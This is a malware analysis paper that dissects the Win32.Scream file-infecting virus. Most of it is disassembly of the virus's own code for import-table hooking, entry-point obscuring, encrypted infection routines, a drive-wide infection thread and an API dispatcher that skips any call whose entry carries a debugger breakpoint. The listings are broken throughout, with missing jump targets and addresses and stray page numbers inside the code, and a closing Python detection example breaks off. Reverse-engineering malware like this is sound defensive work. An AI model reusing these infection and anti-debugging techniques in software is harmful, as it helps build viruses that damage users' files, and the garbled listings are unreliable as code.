Analysis of Win32.Scream


1. Introduction

Scream is a very interesting virus because it combines a large number of techniques in one body. This paper covers its features and internals, dissecting it top-down for easier analysis. At the time of writing the sample appears to be undetected by all anti-virus scanners, so it is referred to here by the name hard-coded inside it: Win32.Scream. Most of the analysis was done with a disassembler (IDA) and some other private tools.

2. Features

The virus contains a number of techniques that I have not seen combined in a virus before, which is what makes it interesting. Some of its features are:

- API hooking engine (per-process residency by patching the host's import table).
- Stealth API calls (every API is reached through a dispatcher that first scans the callee for software breakpoints).
- Entry Point Obscuring (EPO).
- Hard Coded Memory Access (HMA).
- Instruction Length Engine (ILE).
- Encryption/decryption engine (RDKE32).
- Random number generation engine (MT, the Mersenne Twister).

These are only some of the interesting features; the list goes on, but for the moment only these are listed.

3. Pre Analysis

A not-so-complex per-process resident, entry point obscuring (EPO) virus that infects PE files. At run time it launches a thread that performs a directory-traversal infection.

HMA: this engine removes the delta offset for good. It changes every [mem32] operand into a new mem32 address; the caller has to calculate that address and pass it to the engine. The engine rewrites all hard-coded memory accesses except instructions that carry an operand-size, address-size or FS segment prefix.

ILE: this engine calculates the length of an instruction. ESI is loaded with a pointer to the instruction whose size is wanted, and the length comes back in ECX (StealthAPI, below, does `add esi, ecx` after each call and treats a length of zero as an undecodable instruction).

RDKE32: the Random Decoding Key Engine encrypts and decrypts the virus's infection code with SHA.

RNGMT: this engine generates random numbers based on a matrix linear recurrence over a finite binary field (the Mersenne Twister). It provides fast generation of very high quality pseudorandom numbers and was designed specifically to rectify many of the flaws found in older algorithms.

4. Analysis

CODE: C nop CODE: D mov esi, offset _debug CODE: mov esi, offset FRD_Imported_Kernel32_API_Names CODE: mov edi, offset CRC32_Imported_Kernel32_API_Names CODE: C call FRC_MakeCRC32Table CODE: C CODE:004046A1 mov esi, offset FRD_Imported_Imagehlp_API_Names CODE:004046A6 mov edi, offset CRC32_Imported_Imagehlp_API_Names CODE:004046AB call FRC_MakeCRC32Table CODE:004046AB CODE:004046B0 mov esi, offset FRD_Imported_Sfc_API_Names CODE:004046B5 mov edi, offset CRC32_Imported_Sfc_API_Names CODE:004046BA call FRC_MakeCRC32Table CODE:004046BA CODE:004046BF mov esi, offset FRD_Imported_WinMM_API_Names CODE:004046C4 mov edi, offset CRC32_Imported_WinMM_API_Names CODE:004046C9 call FRC_MakeCRC32Table

CODE:004046C9 CODE:004046CE mov esi, offset FRD_Imported_Shell32_API_Names CODE:004046D3 mov edi, offset CRC32_Imported_Shell32_API_Names CODE:004046D8 call FRC_MakeCRC32Table CODE:004046D8 CODE:004046DD mov esi, offset FRD_Hook_API_Names ; "CreateFileA" CODE:004046E2 mov edi, offset API_Hook_Table CODE:004046E2 CODE:004046E7 CODE:004046E7 mov al, [esi] CODE:004046E9 test al, al CODE:004046EB jz CODE:004046EB CODE:004046ED call GetCRC32OfString CODE:004046ED CODE:004046F2 mov [edi], ebx CODE:004046F4 add edi, 0Ch CODE:004046F7 jmp CODE:004046F7 CODE:004046F9 CODE:004046F9 CODE:004046F9 mov esi, offset FRD_File_Names CODE:004046FE mov edi, offset CRC32_KERNEL32_DLL CODE: call FRC_MakeCRC32Table CODE: CODE: push offset FRC_FakeHost CODE: D mov ER_CallingOffset, offset FRC_FakeHost CODE: mov ER_Code, h CODE: mov ER_Code_0, 90h CODE: jmp EntryPoint

Before the virus body runs it does some preparatory work. First it builds the CRC32 checksum tables it will need later: FRC_MakeCRC32Table is called once for each DLL whose exports the virus resolves (kernel32, imagehlp, sfc, winmm, shell32) and once for the DLL/file name list, and the loop above fills API_Hook_Table with one checksum per hooked API name (the entries are 0Ch bytes apart). Then it sets up a fake EPO record: it pushes FRC_FakeHost as if it were the return address of a patched host call and stores the same value in ER_CallingOffset, presumably so that the EPO-restore logic finds a matching record when this first-generation sample runs without an infected host. After that it jumps to the real starting point of the virus.

CODE: EntryPoint: CODE: CODE: pushf CODE: pusha CODE: cmp ThreadHandle, 0 CODE: jz CODE: CODE: B mov ecx, 24h CODE: call RestoreEPOBytes CODE: CODE: popa CODE: popf

4 CODE: retn CODE: CODE: CODE: CODE: CODE: call Initialize CODE: CODE: D test eax, eax CODE: F jz short CODE: F CODE: lea ebx, sub_4010ba CODE: mov [ebp+0c4h], ebx CODE: D lea ebx, CODE: mov [ebp+0c8h], ebx CODE: mov [ebp+0cch], esp CODE: F lea ebx, [ebp+0c0h] CODE: push ebx CODE: xor ebx, ebx CODE: push dword ptr fs:[ebx] CODE: B pop dword ptr [ebp+0c0h] CODE: pop dword ptr fs:[ebx] CODE: push CRC32_KERNEL32_DLL CODE: A call HookAPIs CODE: A CODE: F push CRC32_SHELL32_DLL CODE: call HookAPIs CODE: CODE: A push 0 CODE: C lea eax, MainThread CODE: push esp CODE: push 0 CODE: push 0 CODE: push eax CODE: push 0 CODE: A push 0 CODE: C mov al, 1Ah CODE: E call StealthAPI CODE: E CODE: mov ThreadHandle, eax CODE: pop ebx CODE: test eax, eax CODE: B jz CODE: B CODE: D push 0FFFFFFFEh CODE: F push eax CODE: mov al, 1Ch CODE: call StealthAPI CODE: CODE: call UnInitialize CODE: CODE: C CODE: C CODE: C mov ecx, 1024h CODE:004010A1 call RestoreEPOBytes CODE:004010A1 CODE:004010A6

CODE:004010A6 CODE:004010A6 xor ebx, ebx CODE:004010A8 push dword ptr [ebp+0c0h] CODE:004010AE pop dword ptr fs:[ebx] CODE:004010B1 add esp, 1000h CODE:004010B7 popa CODE:004010B8 popf CODE:004010B9 retn

This is the real entry point of the virus. It first saves the flags and registers so that the host's execution is not disturbed. If ThreadHandle is already non-zero, the infection thread is already running in this process (the entry point was reached a second time, for example through a hooked import), so it only restores the EPO bytes (RestoreEPOBytes with ECX = 24h, the distance from ESP to the host's return address past the pusha/pushf) and returns to the host. Otherwise it calls Initialize to set up the virus's environment (discussed later); if that fails it restores the EPO bytes and leaves immediately. Note the SEH frame installed around the body (the pushes and pops through fs:[ebx] with EBX = 0): the virus uses SEH throughout so that it never crashes the host, at the price of silently swallowing its own faults. With the environment ready it hooks the kernel32 and shell32 imports the host might be using (HookAPIs, called once with the CRC32 of each DLL name), then creates a thread (StealthAPI index 1Ah with MainThread as the start address, consistent with CreateThread) that performs the directory-traversal infection concurrently with the host's code; the handle is kept in ThreadHandle and the thread is then adjusted through index 1Ch with the value -2 (consistent with SetThreadPriority(THREAD_PRIORITY_LOWEST), which keeps the host responsive while the virus scans). Finally it calls UnInitialize to release the libraries it loaded, restores the EPO bytes (this time with ECX = 1024h, because the 1000h-byte work area still sits below the return address), unlinks the SEH frame, releases the work area and returns to the host.
CODE:004010E1 Initialize proc near CODE:004010E1 CODE:004010E1 CODE:004010E1 arg_0 = dword ptr 4 CODE:004010E1 SFC_BaseAddress = dword ptr 8 CODE:004010E1 WINMM_BaseAddress= dword ptr 0Ch CODE:004010E1 SHELL32_BaseAddress= dword ptr 10h CODE:004010E1 arg_14 = dword ptr 18h CODE:004010E1 arg_8c = dword ptr 90h CODE:004010E1 API_SFC_IN_MSTRUC= dword ptr 9Ch CODE:004010E1 API_WINMM_IN_MSTRUC= dword ptr 0A0h CODE:004010E1 arg_b8 = dword ptr 0BCh CODE:004010E1 arg_cc = dword ptr 0D0h CODE:004010E1 arg_d0 = dword ptr 0D4h CODE:004010E1 arg_d4 = dword ptr 0D8h CODE:004010E1 arg_d8 = dword ptr 0DCh CODE:004010E1 arg_1020 = dword ptr 1024h CODE:004010E1 CODE:004010E1 cmp InitializeState, 0 CODE:004010E8 jnz short Initialize CODE:004010E8 CODE:004010EA or InitializeState, 0FFFFFFFFh CODE:004010F1 pop ebx CODE:004010F2 mov ecx, 1000h CODE:004010F7 sub esp, ecx CODE:004010F9 mov ebp, esp CODE:004010FB mov PointerToMSTRUC, ebp CODE: cld CODE: xor eax, eax CODE: mov edi, esp CODE: rep stosb CODE: push ebx CODE: lea ebx, sub_401269

6 CODE: F mov [ebp+arg_d0], ebx CODE: lea ebx, CODE: B mov [ebp+arg_d4], ebx CODE: mov [ebp+arg_d8], esp CODE: lea ebx, [ebp+arg_cc] CODE: D push ebx CODE: E xor ebx, ebx CODE: push dword ptr fs:[ebx] CODE: pop [ebp+arg_cc] CODE: pop dword ptr fs:[ebx] CODE: C mov eax, [esp+arg_1020] CODE: rdtsc CODE: xchg eax, ebx CODE: xchg eax, edx CODE: mov ecx, 10h CODE: C div ecx CODE: E lea edi, Init_Key_Start CODE: xor [edi+edx*4], ebx CODE: push 10h CODE: push edi CODE: A call init_by_array CODE: A CODE: F call GetKernel32Base CODE: F CODE: lea eax, [ebp+arg_14] CODE: lea ebx, CRC32_Imported_Kernel32_API_Names CODE: D push dword ptr [ebp+0] CODE: push 1Eh CODE: push eax CODE: push ebx CODE: call GetAPIsFromCRC32List CODE: CODE: test eax, eax CODE: B jz CODE: B CODE: lea esi, NAME_IMAGEHLP_DLL CODE: push esi CODE: mov al, 3 CODE: A call StealthAPI CODE: A CODE: F test eax, eax CODE: CODE: CODE: mov [ebp+arg_0], eax CODE: A lea edx, [ebp+arg_8c] CODE:004011A0 lea ebx, CRC32_Imported_Imagehlp_API_Names CODE:004011A6 push eax CODE:004011A7 push 3 CODE:004011A9 push edx CODE:004011AA push ebx CODE:004011AB call GetAPIsFromCRC32List CODE:004011AB CODE:004011B0 test eax, eax CODE:004011B2 CODE:004011B2 CODE:004011B8 or SFC_enabled, 0FFFFFFFFh CODE:004011BF lea esi, NAME_SFC_DLL

7 CODE:004011C5 push esi CODE:004011C6 mov al, 3 CODE:004011C8 call StealthAPI CODE:004011C8 CODE:004011CD test eax, eax CODE:004011CF jz CODE:004011CF CODE:004011D1 mov [ebp+sfc_baseaddress], eax CODE:004011D4 lea edx, [ebp+api_sfc_in_mstruc] CODE:004011DA lea ebx, CRC32_Imported_Sfc_API_Names CODE:004011E0 push eax CODE:004011E1 push 1 CODE:004011E3 push edx CODE:004011E4 push ebx CODE:004011E5 call GetAPIsFromCRC32List CODE:004011E5 CODE:004011EA test eax, eax CODE:004011EC jz CODE:004011EC CODE:004011EE and SFC_enabled, 0 CODE:004011EE CODE:004011F5 CODE:004011F5 CODE:004011F5 lea esi, NAME_WINMM_DLL CODE:004011FB push esi CODE:004011FC mov al, 3 CODE:004011FE call StealthAPI CODE:004011FE CODE: test eax, eax CODE: jz CODE: CODE: mov [ebp+winmm_baseaddress], eax CODE: A lea edx, [ebp+api_winmm_in_mstruc] CODE: lea ebx, CRC32_Imported_WinMM_API_Names CODE: push eax CODE: push 7 CODE: push edx CODE: A push ebx CODE: B call GetAPIsFromCRC32List CODE: B CODE: test eax, eax CODE: jz CODE: CODE: lea esi, NAME_SHELL32_DLL CODE: A push esi CODE: B mov al, 3 CODE: D call StealthAPI CODE: D CODE: test eax, eax CODE: jz CODE: CODE: mov [ebp+shell32_baseaddress], eax CODE: lea edx, [ebp+arg_b8] CODE: F lea ebx, CRC32_Imported_Shell32_API_Names CODE: push eax CODE: push 1

CODE: push edx CODE: push ebx CODE: A call GetAPIsFromCRC32List CODE: A CODE: F test eax, eax CODE: jz short CODE: CODE: stc CODE: sbb eax, eax CODE: CODE: CODE: CODE: CODE: xor ebx, ebx CODE: push [ebp+arg_cc] CODE: E pop dword ptr fs:[ebx] CODE: and InitializeState, 0 CODE: retn CODE: Initialize endp

In the previous block the virus initializes its environment so that the rest of the code can work. InitializeState is a re-entrancy guard, set to -1 while the routine runs and cleared on exit. The routine pops its own return address, reserves a 1000h-byte work area on the caller's stack, zeroes it and points EBP at it (saving the pointer in PointerToMSTRUC as well), which is why every caller finishes with add esp, 1000h: nothing is heap-allocated, the whole working state lives in that stack block. It installs an SEH frame, seeds the Mersenne Twister from RDTSC (the low dword of the counter is XORed into one of the 16 key dwords at Init_Key_Start, selected by the high dword modulo 10h, and init_by_array is then run over the 16-dword key), locates kernel32 with GetKernel32Base and resolves 1Eh kernel32 APIs by CRC32 (GetAPIsFromCRC32List) into the table at [ebp+arg_14] that StealthAPI later indexes. It then loads imagehlp, sfc, winmm and shell32 (StealthAPI index 3, consistent with LoadLibraryA) and resolves 3, 1, 7 and 1 APIs from them respectively, keeping the module handles at [ebp+4], [ebp+8], [ebp+0Ch] and [ebp+10h] for UnInitialize; SFC_enabled is set to -1 before the sfc attempt and cleared only when the sfc API resolves. Success leaves EAX = -1 (stc; sbb eax, eax); a failed library load or lookup leaves EAX = 0, which every caller treats as fatal.

CODE: UnInitialize proc near CODE: CODE: push eax CODE: push dword ptr [ebp+4] CODE: mov al, 4 CODE: call StealthAPI CODE: CODE: B push dword ptr [ebp+8] CODE: E mov al, 4 CODE:004012A0 call StealthAPI CODE:004012A0 CODE:004012A5 push dword ptr [ebp+0ch] CODE:004012A8 mov al, 4 CODE:004012AA call StealthAPI CODE:004012AA CODE:004012AF push dword ptr [ebp+10h] CODE:004012B2 mov al, 4 CODE:004012B4 call StealthAPI CODE:004012B4 CODE:004012B9 pop eax CODE:004012BA retn CODE:004012BA CODE:004012BA UnInitialize endp

The previous code block frees the four libraries the virus loaded (StealthAPI index 4 with each handle saved by Initialize, consistent with FreeLibrary), preserves EAX across the calls and returns.

CODE:004012BB RestoreEPOBytes proc near CODE:004012BB CODE:004012BB

CODE:004012BB arg_0 = dword ptr 4 CODE:004012BB CODE:004012BB mov ebx, [esp+ecx+arg_0] CODE:004012BF lea edi, [ebx-5] CODE:004012C2 mov [esp+ecx+arg_0], edi CODE:004012C6 mov ecx, 10h CODE:004012CB lea esi, ER_CallingOffset CODE:004012CB CODE:004012D1 CODE:004012D1 lodsd CODE:004012D2 cmp eax, ebx CODE:004012D4 jz CODE:004012D4 CODE:004012D6 add esi, 5 CODE:004012D9 CODE:004012D9 CODE:004012DB CODE:004012DB movsb CODE:004012DC movsd CODE:004012DD retn CODE:004012DD CODE:004012DD RestoreEPOBytes endp

RestoreEPOBytes undoes the entry point patch. It is entered with ECX holding the displacement of the host's return address on the stack (24h or 1024h above, depending on whether the work area is still present). That return address points just past the 5-byte call the virus planted in the host, so the routine subtracts 5 to get the address of the patched instruction and writes it back over the return address, so that the final retn re-executes the original instruction once it has been restored. It then searches the 16-entry table at ER_CallingOffset for the record whose saved return address equals the one on the stack. Each record is 9 bytes, the 4-byte return address followed by the 5 original host bytes, hence the add esi, 5 that steps over a non-matching record. On a match the 5 saved bytes are copied back over the patched location (movsb followed by movsd). Two practical points: this write lands in the host's code section, so the infection must leave that section writable (the page does not show how), and there is no visible handling for the case where no record matches.

CODE:004012DE MainThread proc near CODE:004012DE CODE:004012DE var_38 = dword ptr -38h CODE:004012DE arg_10e4 = dword ptr 10E8h CODE:004012DE CODE:004012DE pushf CODE:004012DF pusha CODE:004012E0 mov eax, PointerToMSTRUC CODE:004012E5 mov ThreadPointerToMSTRUC, eax CODE:004012EA call Initialize CODE:004012EA CODE:004012EF mov ebx, PointerToMSTRUC CODE:004012F5 xchg ebx, ThreadPointerToMSTRUC CODE:004012FB mov PointerToMSTRUC, ebx CODE: test eax, eax CODE: jnz CODE: CODE: popa CODE: popf CODE: retn CODE: CODE: ; CODE:

10 CODE: CODE: lea ebx, sub_4013fb CODE: E mov [ebp+114h], ebx CODE: lea ebx, CODE: A mov [ebp+118h], ebx CODE: mov [ebp+11ch], esp CODE: lea ebx, [ebp+110h] CODE: C push ebx CODE: D xor ebx, ebx CODE: F push dword ptr fs:[ebx] CODE: pop dword ptr [ebp+110h] CODE: pop dword ptr fs:[ebx] CODE: B lea esi, word_403f16 CODE: lea edi, InfectFile CODE: CODE: CODE: _debug: CODE: nop CODE: push 698h CODE: D push edi CODE: E push esi CODE: F call RDKE32Decrypt CODE: F CODE: cmp ThreadExecution, 0FFFFFFFFh CODE: B jz short CODE: B CODE: D or Infect_Encrypted, 0FFFFFFFFh CODE: mov ecx, 104h CODE: sub esp, ecx CODE: B push esp CODE: C push ecx CODE: D mov al, 0Dh CODE: F call StealthAPI CODE: F CODE: test eax, eax CODE: jz short CODE: CODE: push 5C3A43h CODE: CODE: D CODE: D CODE: D mov eax, 10h CODE: call RandomNumber CODE: CODE: inc eax CODE: mov [ebp+27ch], eax CODE: E push esp CODE: F mov al, 10h CODE: call StealthAPI CODE: CODE: cmp al, 2 CODE: jz CODE: CODE: A cmp al, 3 CODE: C jz CODE: C CODE: E cmp al, 4

11 CODE:004013A0 jnz short CODE:004013A0 CODE:004013A2 CODE:004013A2 CODE:004013A2 CODE:004013A2 push esp CODE:004013A3 mov al, 0Ch CODE:004013A5 call StealthAPI CODE:004013A5 CODE:004013AA call DirectoryTraversal CODE:004013AA CODE:004013AF cmp ThreadExecution, 0FFFFFFFFh CODE:004013B6 jz short CODE:004013B6 CODE:004013B8 CODE:004013B8 CODE:004013B8 cmp [esp+38h+var_38], '\:Z' CODE:004013BF jz short CODE:004013BF CODE:004013C1 inc [esp+38h+var_38] CODE:004013C4 jmp short CODE:004013C4 CODE:004013C6 CODE:004013C6 CODE:004013C6 CODE:004013C6 CODE:004013C6 pop edx CODE:004013C7 push esp CODE:004013C8 mov al, 0Ch CODE:004013CA call StealthAPI CODE:004013CA CODE:004013CF add esp, 104h CODE:004013CF CODE:004013D5 CODE:004013D5 CODE:004013D5 CODE:004013D5 CODE:004013D5 call UnInitialize CODE:004013D5 CODE:004013DA xor ebx, ebx CODE:004013DC push dword ptr [ebp+110h] CODE:004013E2 pop dword ptr fs:[ebx] CODE:004013E5 mov eax, [ebp+7ch] CODE:004013E8 mov [esp-0cch+arg_10e4], eax CODE:004013EF add esp, 1000h CODE:004013F5 popa CODE:004013F6 popf CODE:004013F7 push 0 CODE:004013F9 call eax CODE:004013F9 CODE:004013F9 MainThread endp The previous code block in brief allocates memory for the virus, retrieves API addresses, and decrypts the infection code and does a directory traversal search.

12 CODE: PayloadThread proc near CODE: CODE: arg_ff4 = dword ptr 0FF8h CODE: CODE: pushf CODE: pusha CODE: mov eax, PointerToMSTRUC CODE: mov Thread2PointerToMSTRUC, eax CODE: E call Initialize CODE: E CODE: mov ebx, PointerToMSTRUC CODE: xchg ebx, Thread2PointerToMSTRUC CODE: F mov PointerToMSTRUC, ebx CODE: test eax, eax CODE: jnz CODE: CODE: popa CODE: A popf CODE: B retn CODE: B CODE: C CODE: C CODE: C lea ebx, sub_4014b1 CODE: mov [ebp+124h], ebx CODE: lea CODE: E mov [ebp+128h], ebx CODE: mov [ebp+12ch], esp CODE: A lea ebx, [ebp+120h] CODE: push ebx CODE: xor ebx, ebx CODE: push dword ptr fs:[ebx] CODE: pop dword ptr [ebp+120h] CODE: C pop dword ptr fs:[ebx] CODE: F lea eax, Payload_Song CODE: push eax CODE: call PlayMidiSong CODE: CODE: B CODE: B call UnInitialize CODE: B CODE: xor ebx, ebx CODE: push dword ptr [ebp+120h] CODE: pop dword ptr fs:[ebx] CODE: B mov eax, [ebp+7ch] CODE: E mov [esp+24h+arg_ff4], eax CODE:004014A5 add esp, 1000h CODE:004014AB popa CODE:004014AC popf CODE:004014AD push 0 CODE:004014AF call eax CODE:004014AF CODE:004014AF PayloadThread endp

The previous code block plays a small MIDI tune as the payload of the virus. PayloadThread is started from the ShellAboutA hook handler (shown further down) with a probability of one in three (RandomNumber with EAX = 3 must return 0), together with a message box; in that case the original ShellAboutA is not called at all.

CODE:004014D8 StealthAPI proc near CODE:004014D8 CODE:004014D8 CODE:004014D8 var_24 = dword ptr -24h CODE:004014D8 CODE:004014D8 movzx eax, al CODE:004014DB mov eax, [ebp+eax*4+18h] CODE:004014DF pusha CODE:004014E0 push 0Ah CODE:004014E2 xchg eax, esi CODE:004014E2 CODE:004014E3 CODE:004014E3 cmp byte ptr [esi], 0CCh CODE:004014E6 jz CODE:004014E6 CODE:004014E8 cmp word ptr [esi], 0CD03h CODE:004014ED jz CODE:004014ED CODE:004014EF call ILE CODE:004014EF CODE:004014F4 add esi, ecx CODE:004014F6 jecxz CODE:004014F6 CODE:004014F8 dec [esp+24h+var_24] CODE:004014FB jnz CODE:004014FB CODE:004014FD CODE:004014FD pop eax CODE:004014FE popa CODE:004014FF jmp eax CODE:004014FF CODE: CODE: CODE: CODE: pop eax CODE: popa CODE: retn CODE: CODE: StealthAPI endp

The previous code block is StealthAPI, one of the most important routines in this virus: every API call in the body goes through it. AL holds an index into the table of resolved API addresses in the work area ([ebp+eax*4+18h], filled by GetAPIsFromCRC32List), so the body never contains a direct call or a readable API name. Before transferring control it walks up to 0Ah instructions of the target's prologue with the ILE and, if any of them is a software breakpoint (the one-byte 0CCh or the two-byte 0CD03h encoding of int 3), it returns to the caller without calling the API at all; an instruction the ILE cannot decode (length 0, caught by jecxz) also ends the scan that way. Otherwise it jumps to the API with the caller's arguments still on the stack, so the API returns straight to the caller. This defeats a breakpoint placed on the first instructions of an API, but it is blind to hardware breakpoints and to anything deeper than ten instructions; from the analyst's side, break inside the API body or on StealthAPI itself rather than on the API entry, because an entry breakpoint simply makes the virus skip the call.

CODE: PlayMidiSong proc near CODE: CODE: var_38 = dword ptr -38h CODE: arg_164 = dword ptr 168h CODE: CODE: pusha CODE: mov ecx, 178h

14 CODE: A sub esp, ecx CODE: C mov edi, esp CODE: E xor eax, eax CODE: rep stosb CODE: mov edi, esp CODE: lea eax, [edi] CODE: push 0 CODE: push 0 CODE: A push 0 CODE: C push 0FFFFFFFFh CODE: E push eax CODE: F mov al, 27h CODE: call StealthAPI CODE: CODE: test eax, eax CODE: CODE: CODE: E mov esi, [esp+34h+arg_164] CODE: lodsd CODE: xchg eax, ecx CODE: imul edx, ecx, 10h CODE: A add edx, esi CODE: C xor ebx, ebx CODE: C CODE: E CODE: E lodsd CODE: F mov [edi+ebx+10h], eax CODE: push eax CODE: lodsd CODE: xchg eax, [esp+38h+var_38] CODE: push eax CODE: add eax, 0B0h CODE: E push 0 CODE: push 0 CODE: push eax CODE: call SendData CODE: CODE: pop eax CODE: add eax, 0C0h CODE: E push 0 CODE: push [esp+3ch+var_38] CODE: push eax CODE: call SendData CODE: CODE: A pop eax CODE: B lodsd CODE: C mov [edi+ebx+14h], eax CODE: lodsd CODE: mov [edi+ebx+18h], eax CODE: mov [edi+ebx+1ch], edx CODE: add edx, eax CODE: B add ebx, 18h CODE: E CODE: E CODE: and dword ptr [edi+0ch], 0 CODE:

15 CODE: CODE: CODE: and dword ptr [edi+8], 0 CODE: mov ecx, 0Fh CODE: D xor ebx, ebx CODE: D CODE: F CODE: F mov esi, [edi+ebx+1ch] CODE: mov edx, [edi+ebx+10h] CODE: add edx, 90h CODE: D mov eax, [edi+ebx+18h] CODE:004015A1 add eax, [edi+ebx+20h] CODE:004015A5 test eax, eax CODE:004015A7 jz CODE:004015A7 CODE:004015A9 or dword ptr [edi+8], 0FFFFFFFFh CODE:004015AD cmp dword ptr [edi+0ch], 0 CODE:004015B1 jz CODE:004015B1 CODE:004015B3 dec dword ptr [edi+ebx+20h] CODE:004015B7 jnz CODE:004015B7 CODE:004015B9 cmp byte ptr [edi+ebx+24h], 80h CODE:004015BE jz CODE:004015BE CODE:004015C0 sub esi, 5 CODE:004015C3 push ecx CODE:004015C4 mov ecx, 5 CODE:004015C9 xor eax, eax CODE:004015C9 CODE:004015CB CODE:004015CB push 0 CODE:004015CD lodsb CODE:004015CE push eax CODE:004015CF push edx CODE:004015D0 call SendData CODE:004015D0 CODE:004015D5 CODE:004015D5 CODE:004015D7 pop ecx CODE:004015D7 CODE:004015D8 CODE:004015D8 CODE:004015D8 mov eax, [edi+ebx+18h] CODE:004015DC test eax, eax CODE:004015DE jz CODE:004015DE CODE:004015E0 lodsb CODE:004015E1 dec dword ptr [edi+ebx+18h] CODE:004015E5 mov ah, al CODE:004015E7 and ah, 80h CODE:004015EA mov [edi+ebx+24h], ah CODE:004015EE and al, 7Fh CODE:004015F0 mov [edi+ebx+20h], al

16 CODE:004015F4 test ah, ah CODE:004015F6 jnz short CODE:004015F6 CODE:004015F8 push ecx CODE:004015F9 mov ecx, 5 CODE:004015FE sub [edi+ebx+18h], ecx CODE: xor eax, eax CODE: CODE: CODE: push dword ptr [edi+ebx+14h] CODE: lodsb CODE: push eax CODE: A push edx CODE: B call SendData CODE: B CODE: CODE: CODE: pop ecx CODE: CODE: CODE: mov [edi+ebx+1ch], esi CODE: CODE: CODE: CODE: add ebx, 18h CODE: A dec ecx CODE: B CODE: B CODE: or dword ptr [edi+0ch], 0FFFFFFFFh CODE: push 50h CODE: mov al, 1 CODE: call StealthAPI CODE: CODE: E cmp dword ptr [edi+8], 0 CODE: CODE: CODE: push dword ptr [edi] CODE: A mov al, 24h CODE: C call StealthAPI CODE: C CODE: CODE: add esp, 178h CODE: popa CODE: retn 4 CODE: CODE: PlayMidiSong endp The previous code block plays an embedded midi song hard coded in the virus as notes. CODE: B SendData CODE: B proc near

17 CODE: B CODE: B ARG1 = dword ptr 4 CODE: B ARG2 = dword ptr 8 CODE: B ARG3 = dword ptr 0Ch CODE: B CODE: B pusha CODE: C mov eax, [esp+20h+arg3] CODE: shl eax, 10h CODE: mov ebx, [esp+20h+arg2] CODE: shl ebx, 8 CODE: A add eax, ebx CODE: C add eax, [esp+20h+arg1] CODE: push eax CODE: push dword ptr [edi] CODE: mov al, 28h CODE: call StealthAPI CODE: CODE: A test eax, eax CODE: C popa CODE: D retn 0Ch CODE: D CODE: D SendData endp The previous code block is used to send data to the midi output device. CODE: HookAPIs proc near CODE: CODE: pusha CODE: push 0 CODE: mov al, 2 CODE: call StealthAPI CODE: CODE: A xchg eax, ebx CODE: B mov esi, [ebx+3ch] CODE: E mov esi, [ebx+esi+80h] CODE: add esi, ebx CODE: CODE: CODE: cmp dword ptr [esi], 0 CODE: A jz CODE: A CODE: C push esi CODE: D mov esi, [esi+0ch] CODE: add esi, ebx CODE: push ebx CODE: call Uppercase CODE: CODE: call GetCRC32OfString CODE: CODE: D cmp [esp+2ch], ebx CODE:004016A1 jz CODE:004016A1 CODE:004016A3 pop ebx CODE:004016A4 pop esi

18 CODE:004016A5 add esi, 14h CODE:004016A8 jmp short CODE:004016A8 CODE:004016AA ; CODE:004016AA CODE:004016AA pop ebx CODE:004016AB pop esi CODE:004016AC xor ecx, ecx CODE:004016AE mov edx, [esi+10h] CODE:004016B1 add edx, ebx CODE:004016B3 mov esi, [esi] CODE:004016B5 add esi, ebx CODE:004016B5 CODE:004016B7 CODE:004016B7 lodsd CODE:004016B8 test eax, eax CODE:004016BA jz CODE:004016BA CODE:004016BC push esi CODE:004016BD lea esi, [eax+ebx+2] CODE:004016C1 lea edi, API_Hook_Table CODE:004016C7 cmp al, 80h CODE:004016C9 jz CODE:004016C9 CODE:004016CB CODE:004016CB cmp byte ptr [edi], 0 CODE:004016CE jz CODE:004016CE CODE:004016D0 push esi CODE:004016D1 push ebx CODE:004016D2 call GetCRC32OfString CODE:004016D2 CODE:004016D7 cmp [edi], ebx CODE:004016D9 pop ebx CODE:004016DA jz CODE:004016DA CODE:004016DC CODE:004016DC pop esi CODE:004016DD add edi, 0Ch CODE:004016E0 jmp CODE:004016E0 CODE:004016E2 ; CODE:004016E2 CODE:004016E2 lea esi, [edx+ecx*4] CODE:004016E5 mov eax, [esi] CODE:004016E7 mov [edi+8], eax CODE:004016EA lea eax, EntryPoint CODE:004016F0 add eax, [edi+4] CODE:004016F3 mov [esi], eax CODE:004016F5 jmp

CODE:004016F5 CODE:004016F7 ; CODE:004016F7 CODE:004016F7 CODE:004016F7 pop esi CODE:004016F8 inc ecx CODE:004016F9 jmp CODE:004016F9 CODE:004016FB ; CODE:004016FB CODE:004016FB CODE:004016FB popa CODE:004016FC retn 4 CODE:004016FC CODE:004016FC HookAPIs endp

The previous code block hooks several APIs, which is what gives the virus its per-process residency. HookAPIs takes the CRC32 of the DLL name to hook as its argument, obtains the host's module base (StealthAPI index 2 with argument 0, consistent with GetModuleHandleA(NULL)) and walks the host's import directory (RVA at offset 80h of the PE header). For each import descriptor (14h bytes apart) it uppercases the DLL name and compares its CRC32 with the argument. Once the matching DLL is found it walks the import name table (OriginalFirstThunk, at offset 0 of the descriptor) in parallel with the IAT (FirstThunk, at offset 10h), skips ordinal imports, and computes the CRC32 of every imported name (hint/name entry + 2). Each checksum is looked up in API_Hook_Table, whose 0Ch-byte entries hold the CRC32 of the hooked name, the offset of the hook stub relative to EntryPoint and a slot for the original address: on a match the current IAT value is saved into that slot and the IAT entry is overwritten with EntryPoint plus the stub offset. Each stub, shown next, is a call GenericHookHandler followed by a jmp through the saved original address, so the hooked call still reaches the real API with its original arguments after the handler has examined the file name it was given. Because only this process's IAT is patched, calls made through GetProcAddress or from other modules are not intercepted, and comparing the host's IAT entries with the real export addresses (or simply with the address range of the imported module) exposes the hooks.

CODE:004016FF call GenericHookHandler CODE:004016FF CODE: jmp AH_CreateFileA CODE: CODE: A CODE: A call GenericHookHandler CODE: A CODE: F jmp AH_WinExec CODE: F CODE: CODE: call GenericHookHandler CODE: CODE: A jmp AH_OpenFile CODE: A CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH lopen CODE: CODE: B CODE: B call GenericHookHandler CODE: B CODE: jmp AH_CreateProcessA CODE: CODE: CODE: call GenericHookHandler CODE: CODE: B jmp AH_CopyFileA CODE: B CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH_MoveFileA
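The IAT walk that HookAPIs performs, and the check a defender would run against it, as an added example written for this page (it is not the virus's code and not the author's tooling). It builds a constructed, flat PE32 image in which RVAs equal offsets, hooks the kernel32 imports by CRC32 exactly as described above, and then flags IAT slots whose target lies outside the module they import from. All addresses, the hook stub addresses and the module ranges are made up; zlib's CRC-32 is used because it is the same reflected 0xEDB88320 polynomial the virus's GetCRC32OfString implements.

```python
import struct
import zlib

IMAGE_ORDINAL_FLAG32 = 0x80000000


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def crc32_upper(name: bytes) -> int:
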